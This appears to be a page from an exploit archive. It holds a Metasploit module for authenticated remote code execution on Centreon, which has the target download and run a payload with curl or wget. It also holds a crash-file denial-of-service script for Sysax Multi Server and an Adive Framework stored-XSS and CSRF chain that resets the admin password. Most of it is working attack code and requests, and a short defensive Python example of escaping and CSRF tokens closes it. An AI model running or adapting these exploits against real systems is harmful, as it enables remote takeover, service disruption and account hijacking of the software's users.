# Current source: https://github.com/rapid7/metasploit-framework #
####################################################################

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
      "Description" => %q{
        Authenticated Remote Code Execution on Centreon Web Appliances.
        Affected versions: =< 18.10, 19.04
        By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
        Vendor verified: 09/17/2019
        Vendor patched: 10/16/2019
        Public disclosure: 10/18/2019
      },
      "License" => MSF_LICENSE,
      'Author' => [
        'TheCyberGeek', # Discovery
        'enjloezz' # Discovery and Metasploit Module
      ],
      'References' =>
        [
          ['URL','https://github.com/centreon/centreon/pull/7864'],
          ['CVE','2019-16405']
        ],
      "Platform" => "linux",
      "Targets" => [
        ["Centreon", {}],
      ],
      "Stance" => Msf::Exploit::Stance::Aggressive,
      "Privileged" => false,
      "DisclosureDate" => "Oct 19 2019",
      "DefaultOptions" => {
        "SRVPORT" => 80,
      },
      "DefaultTarget" => 0
    ))

    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  def exploit
    begin
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      # Named capture: Ruby binds the local variable `token` on a successful match.
      /centreon_token".*value="(?<token>.*?)"/ =~ res.body

      unless token
        vprint_error("Couldn't get token, check your TARGETURI")
        return
      end
      res = send_request_cgi!(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "useralias" => datastore["USERNAME"],
          "password" => datastore["PASSWORD"],
          "centreon_token" => token,
        },
      )
      unless res.body.include? "You need to enable JavaScript to run this app"
        fail_with(Failure::NoAccess, "Cannot login to Centreon")
      end
      print_good("Login Successful!")
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "method" => "GET",
        "cookie" => @phpsessid,
        "vars_get" => {
          "p" => "60904",
          "o" => "c",
          "resource_id" => 1,
        },
      )
      /centreon_token".*value="(?<token>.*?)"/ =~ res.body
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "vars_get" => {
          "p" => "60904",
        },
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "resource_name": "$USER1$",
          "resource_line": "/",
          "instance_id": 1,
          "resource_activate": 1,
          "resource_comment": "Nagios Plugins Path",
          "submitC": "Save",
          "resource_id": 1,
          "o": "c",
          "initialValues": "\"a:0:{}\"",
          "centreon_token": token
        },
      )
      begin
        Timeout.timeout(datastore["HTTPDELAY"]) { super }
      rescue Timeout::Error
        vprint_error("Server Timed Out...")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error...")
    end
  end

  def primer
    @pl = generate_payload_exe
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr

    proto = ssl ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
    send_payload(payload_uri)
  end

  def send_payload(payload_uri)
    # Download method is selected by the TARGETS option registered above.
    payload = "/bin/bash -c \"" + ( datastore["TARGETS"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
    print_good("Sending Payload")
    send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
    )
  end

  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  def run_shell
    print_good("Setting permissions for the payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
        "o": "p",
        "min": 1,
      },
    )

    print_good("Executing Payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
end


Sysax Multi Server version 5.50 suffers from a denial of service vulnerability.

MD5 | e4152fb84751bd6f869db1e761ae31c5

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: Windows 7
# CVE : [if applicable]

1) Download the software and install it on Windows 7
2) Run the software, then click Install License
3) Upload the crash.key file; it will ask you to run the program again
4) The program crashes and never runs


#!/usr/bin/python

buffer = "A" * 1000

payload = buffer
try:
    f = open("crash.key", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")


Adive Framework version 2.0.8 suffers from a persistent cross site scripting vulnerability.

MD5 | e8a97ac0caa8d68a4cd900417cf3af78

# Exploit Title:  Adive Framework 2.0.8 - Persistent Cross-Site Scripting
# Exploit Author: Sarthak Saini
# Dork: N/A
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# Category: Webapps
# Tested on: Windows 64-bit / Mozilla Firefox

1) Persistent Cross-site Scripting at user add page

Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting

Payload:- alert(1)

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=alert('xss')&pass=test&cpass=test&permission=3


|----------------------------------------------------------------------------------


2) Account takeover - cross-site request forgery


Description : an attacker can craft malicious JavaScript and attach it to the stored XSS; when the admin visits the /admin/user page the payload triggers.

-> Save the payload as exp.js

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
    var nuri ="http://192.168.2.5/admin/config";
    xhttp = new XMLHttpRequest();
    xhttp.open("POST", nuri, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.withCredentials = "true";
    var body = "";
    body += "\r\n\r\n";
    body +=
    "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
    xhttp.send(body);
    return true;
}

execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server hosting exp.js and reference it from the XSS payload

Payload:-

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3


-> As soon as the admin visits the page the payload triggers and the admin password is changed to hacked@123
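Both stored-XSS reports on this page (the Park Ticketing 'search ticket' field and the Adive `userName`/`userUsername` fields) and the Adive account-takeover chain come down to two missing controls: user-supplied strings are placed into HTML without escaping, and the state-changing `POST /admin/config` request is accepted without proof that it came from the application's own form. The following is an added example, not code from either project: a minimal in-memory model of an "add user" handler and a user-list renderer with both controls in place. The session and form dictionaries, function names and the sample inputs are mine.

```python
import hmac
import html
import secrets


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the session; the form must echo it back."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_ok(session: dict, form: dict) -> bool:
    """Constant-time comparison of the echoed token against the session copy."""
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected:
        return False
    return hmac.compare_digest(expected.encode("utf-8"), supplied.encode("utf-8"))


def add_user(session: dict, form: dict, users: list) -> int:
    """Model of POST /admin/user/add; returns an HTTP-style status code.

    A cross-site request (the exp.js pattern above) carries the victim's
    session cookie, so `session` is valid, but the attacker's page cannot
    read the token from the victim's form and the request fails here."""
    if not csrf_ok(session, form):
        return 403
    name = form.get("userName", "").strip()
    username = form.get("userUsername", "").strip()
    if not name or not username or len(username) > 64:
        return 400
    # Store the raw strings; escaping happens at output time, in one place.
    users.append({"name": name, "username": username})
    return 201


def render_user_rows(users: list) -> str:
    """Model of the /admin/user listing: every field is HTML-escaped at the
    point it is written into markup, so stored payloads render as text."""
    return "".join(
        "<tr><td>%s</td><td>%s</td></tr>"
        % (html.escape(u["name"], quote=True), html.escape(u["username"], quote=True))
        for u in users
    )


# Constructed sample input shaped like the stored payloads in these reports.
SAMPLE_NAME = '<script src="http://attacker.example/exp.js"></script>'

if __name__ == "__main__":
    session, users = {}, []
    token = issue_csrf_token(session)
    print("no token   ->", add_user(session, {"userName": "x", "userUsername": "y"}, users))
    print("with token ->", add_user(session, {"userName": SAMPLE_NAME, "userUsername": "test",
                                               "csrf_token": token}, users))
    print(render_user_rows(users))
```

The order of the two controls matters for this particular chain: the CSRF token defeats a request forged from another origin, but script that is already executing inside the admin's page through stored XSS runs in the application's origin and can read the token from the DOM. Output escaping is therefore the control that breaks the chain described above; the token closes the separate, plain cross-site variant.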

|-----------------------------------------EOF-----------------------------------------
